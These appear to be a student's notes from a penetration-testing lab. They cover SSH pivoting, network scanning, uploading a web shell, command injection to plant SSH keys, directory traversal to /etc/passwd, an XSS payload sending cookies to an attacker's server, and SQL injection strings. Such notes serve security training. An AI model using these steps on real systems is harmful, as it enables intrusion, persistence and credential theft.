web server on .111
ssh -S /tmp/jump jump -O forward -L 21200:192.168.28.111:80
ssh -S /tmp/jump jump -O forward -L 21201:192.168.28.111:8080
#SSH Access to .120
ssh -S /tmp/jump jump -O forward -L 21205:192.168.28.120:4242
Password: YourTempPassword
# Ping Sweep on .120
for i in {225..254}; do (ping -c 1 192.168.150.$i | grep "bytes from" &) ; done
        64 bytes from 192.168.150.225: icmp_seq=1 ttl=64 time=6.77 ms
        64 bytes from 192.168.150.227: icmp_seq=1 ttl=63 time=4.53 ms
        64 bytes from 192.168.150.226: icmp_seq=1 ttl=63 time=6.13 ms
        64 bytes from 192.168.150.245: icmp_seq=1 ttl=127 time=8.69 ms
        64 bytes from 192.168.150.253: icmp_seq=1 ttl=63 time=1.22 ms
#Close old dynamic
ssh -S /tmp/jump jump -O cancel -D 9050
#Create Socket to .120
ssh -MS /tmp/120 127.0.0.1 -p 21205
#New Dynamic on .120
ssh -S /tmp/120 120 -O forward -D 9050
#Nmap scan open hosts
proxychains nmap 192.168.150.245,225,226,253
          Nmap scan report for 192.168.150.225
          Host is up (0.00066s latency).
          All 1000 scanned ports on 192.168.150.225 are closed
          
          Nmap scan report for 192.168.150.226
          Host is up (0.00083s latency).
          Not shown: 999 closed ports
          PORT   STATE SERVICE
          53/tcp open  domain
          
          Nmap scan report for 192.168.150.245
          Host is up (0.00084s latency).
          Not shown: 995 closed ports
          PORT     STATE SERVICE
          135/tcp  open  msrpc
          139/tcp  open  netbios-ssn
          445/tcp  open  microsoft-ds
          3389/tcp open  ms-wbt-server
          9999/tcp open  abyss
          
          Nmap scan report for 192.168.150.253
          Host is up (0.00076s latency).
          Not shown: 998 closed ports
          PORT    STATE SERVICE
          80/tcp  open  http
          514/tcp open  shell
#Use SMB script on .245
proxychains nmap 192.168.150.245 --script=smb-os-discovery
          Nmap scan report for 192.168.150.245
          Host is up (0.00089s latency).
          Not shown: 995 closed ports
          PORT     STATE SERVICE
          135/tcp  open  msrpc
          139/tcp  open  netbios-ssn
          445/tcp  open  microsoft-ds
          3389/tcp open  ms-wbt-server
          9999/tcp open  abyss
          
          Host script results:
          | smb-os-discovery: 
          |   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
          |   OS CPE: cpe:/o:microsoft:windows_10::-
          |   Computer name: o79kclb6P3tgUkL9XKjr
          |   NetBIOS computer name: O79KCLB6P3TGUKL\x00
          |   Workgroup: WORKGROUP\x00
          |_  System time: 2024-09-17T19:45:11+00:00
#Close dynamic on .120
ssh -S /tmp/120 120 -O cancel -D 9050


--------------------------------------------------------------DAY 2 WEB EXPLOITATION 1------------------------------------------------------
DEMO
#enumerate robots.txt
        User-agent: *
        Allow: /uploads
        Allow: /chat
        Allow: /cmdinjection
        Allow: /java
        Allow: /path
        Allow: /webexample
        Disallow: /cross
        Disallow: /
        
        
        User-agent: Googlebot
        Disallow: /
        
        
        User-agent: Baiduspider
        Disallow: /
#From Surfing 
-Can upload file
#Use Tools to enumerate server 
nmap --script=http-enum 10.50.28.11 -T5 -vvvv
        22/tcp   open   ssh           syn-ack
        80/tcp   open   http          syn-ack
        | http-enum: 
        |   /robots.txt: Robots file
        |   /java/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
        |   /path/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
        |_  /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
        3389/tcp closed ms-wbt-server conn-refused
        8080/tcp closed http-proxy    conn-refused
        9999/tcp closed abyss         conn-refused

nikto v -h 10.50.28.11
        OSVDB-3268: /uploads/: Directory indexing found.
        + File/dir '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
        + OSVDB-3268: /chat/: Directory indexing found.
        + File/dir '/chat/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
        + OSVDB-3268: /cmdinjection/: Directory indexing found.
        + File/dir '/cmdinjection/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
        + OSVDB-3268: /java/: Directory indexing found.
        + File/dir '/java/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
        + OSVDB-3268: /path/: Directory indexing found.
        + File/dir '/path/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
        + OSVDB-3268: /webexample/: Directory indexing found.
        + File/dir '/webexample/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
        + OSVDB-3268: /cross/: Directory indexing found.
        + File/dir '/cross/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
        + File/dir '/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
        + "robots.txt" contains 10 entries which should be manually viewed.
        + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
        + OSVDB-3092: /java/: This might be interesting...
        + OSVDB-3233: /icons/README: Apache default file found.
#Navigate all paths found 
/uploads/mal.php: Allows commands to be run by user www-data
#Main Page allows file upload, uploaded web shell allgood.php to /uploads 
#/cmdinjection is vulnerable to command injection 
#Create ssh keys 
ssh-keygen
#Find Home Dir on web machine 
; ls -la /var/www
# HTML Directory is where web is served from
#.ssh dosent exist 
; mkdir /var/www/.ssh
# Put ssh public key into /var/www/.ssh/authorized_keys
; echo "; MIIEowIBAAKCAQEAp...FKBkhbB+mcAc138dUCCFdt" >> /var/www/.ssh/authorized_keys
#Create MS socket to the web server using private ssh key and www-data creds 
ssh -i .ssh/id_rsa -MS /tmp/web www-data@10.50.28.11
#Directory Traversal using a built in tool using cat POST Method
../../../../../../../../etc/passwd
#Directory Traversal using a built in tool using cat GET Method
http://10.50.28.11/path/pathdemo.php?myfile=../../../../../../../../etc/passwd
#To find if XXS is possible 
<script>alert('XSS!');</script>
#Create http server on Lin-ops
python3 -m http.server
#add script to server that redirects victim to your web server and sends you cookie
<script>document.location="http://10.50.40.70:8000/?" + document.cookie;</script>
DEMO^^^
#set up port forward to http and ssh
ssh -S /tmp/jump jump -O forward -L 5150:10.100.28.40:80 -L 5151:10.100.28.40:4444
# Robots.txt
        User-agent: *
        Disallow: /net_test
#nmap scan 
nmap --script=http-enum 10.50.28.11 -T5 -vvvv
         /robots.txt: Robots file
        |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
        |   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
        |_  /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
#/net_test contains industry_check.php
Allows Commands to be run from middle box
#uploads contains document containing a message 
        Just completed my Cyber Awareness training and it says ATOPIA. Last I checked that is a whole other country.
        Please send me a corrected cert with the right now.
        
        I took my online training from the following website
        
        10.100.28.55
#mkdir .ssh in billybob home directory
#Upload public key in .ssh/authorized_keys
#Create socket to Billybob
ssh -MS /tmp/web billybob@127.0.0.1 -p 5151
#Close old dynamic
ssh -S /tmp/jump jump -O cancel -D 9050
#Create dynamic onto billybob
ssh -S /tmp/web bill -O forward -D 9050
#Create port forward to T2 web server 
ssh -S /tmp/web T2  -O foward -L 5152:10.100.28.55:80
-------------------------------------------------------------DAY 2-------------------------------------------------
#Create ssh port forward to .48 
ssh -S /tmp/jump jump -O forward -L 7012:10.100.28.48:80 -L 7013:10.100.28.48:4444
#Categories page is vulnerable to GET SQL injection
#In URL 
OR 1=1
UNION SELECT 1,2,3 
UNION SELECT GOLDEN SEARCH
UNION SELECT ...,...,...(@@version used for SQL ver) from sqlinjection.share4/members/payments 
#SearchProducts is vulnerable to POST SQL injection 
'OR 1='1


